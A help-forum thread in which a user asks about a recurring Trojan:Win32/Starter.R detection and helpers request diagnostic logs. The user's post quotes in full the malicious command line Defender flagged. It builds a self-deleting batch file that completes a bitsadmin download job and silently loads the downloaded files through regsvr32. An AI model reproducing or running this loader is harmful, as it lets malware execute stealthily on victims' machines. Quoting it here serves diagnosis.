Trojan:Win32/Starter.R at every restart and several times after reboot

Whenever I start the computer, Windows Defender detects Trojan:Win32/Starter.R and this happens several times after, without restarting also.
So far no anti-virus program was able to find a virus or trojan.
Windows Defender gives me the info below:

CmdLine: \Device\HarddiskVolume2\Windows\System32\cmd.exe "cmd.exe" /c start /min cmd /c "(echo @echo off > "C:\ProgramData\fc3929f4-0cf7-0\x.bat" & echo bitsadmin /complete fc3929f4-0cf7-0 ^> nul >> "C:\ProgramData\fc3929f4-0cf7-0\x.bat" & echo bitsadmin /cancel fc3929f4-0cf7-0 ^> nul >> "C:\ProgramData\fc3929f4-0cf7-0\x.bat" & echo if exist "C:\ProgramData\fc3929f4-0cf7-0\fc3929f4-0cf7-0.d" goto q >> "C:\ProgramData\fc3929f4-0cf7-0\x.bat" & for /f %i in ('dir /a:-d /b /w "C:\ProgramData\fc3929f4-0cf7-0\*.tmp"') do (echo start /b /min regsvr32.exe /s /n /i:"!=41cf7ce9fc3929f4 " "C:\ProgramData\fc3929f4-0cf7-0\%i" >> "C:\ProgramData\fc3929f4-0cf7-0\x.bat")) > nul & echo :q >> "C:\ProgramData\fc3929f4-0cf7-0\x.bat" & echo start /b /min regsvr32.exe /s /n /i:"!=41cf7ce9fc3929f4 " "C:\ProgramData\fc3929f4-0cf7-0\fc3929f4-0cf7-0.d" >> "C:\ProgramData\fc3929f4-0cf7-0\x.bat" & echo del "C:\ProgramData\fc3929f4-0cf7-0\x.bat" ^& exit >> "C:\ProgramData\fc3929f4-0cf7-0\x.bat" & "C:\ProgramData\fc3929f4-0cf7-0\x.bat""

I do not know what it means, or how come this thing appears without a location.

There is no fc3929f4-0cf7-0 folder in ProgramData, but of course these commands may have deleted it, after it runs. I am afraid these commands may also create other commands or batch files by using nul and bitsadmin. I am not sure. It apparently also uses regsvr32.exe. I do not know why it uses !=41cf7ce9fc3929f4 and for what.

All I could do was make anti-virus checks with different programs. I do not know what to search for in regedit or in the computer to get rid of this.

I also did System Restores to get the system around 10 days before, but it still came up.

Thanks.

Welcome to the forum

please download and run Downloading Farbar Recovery Scan Tool

Right click to run as administrator (XP users click run after receipt of Windows Security Warning - Open File). When the tool opens click Yes to disclaimer.
Make sure that Addition option is checked.
Press Scan button.
It will produce a log called FRST.txt in the same directory the tool is run from.
Please copy and paste log back .
The first time the tool is run it generates another log (Addition.txt - also located in the same directory as FRST.exe/FRST64.exe).

We need additions file

Here it is.

Attachment 212232

There is a problem in that you are showing a lot of cracks being used and either a pirated windows or office and you have hidden AlternateDataStream once you use cracks there is know way if they came with a free gift virus. There is a scanner specific for your malware

WinThruster is Downloading...

It is a genuine Windows. Computer is directly from a Microsoft partner. Have the label and license sticked to the back. I made the anti-virus checks without any exclusions. None of the programs showed any virus. If there are any AlternateDataStreams, they are not related to the operating system.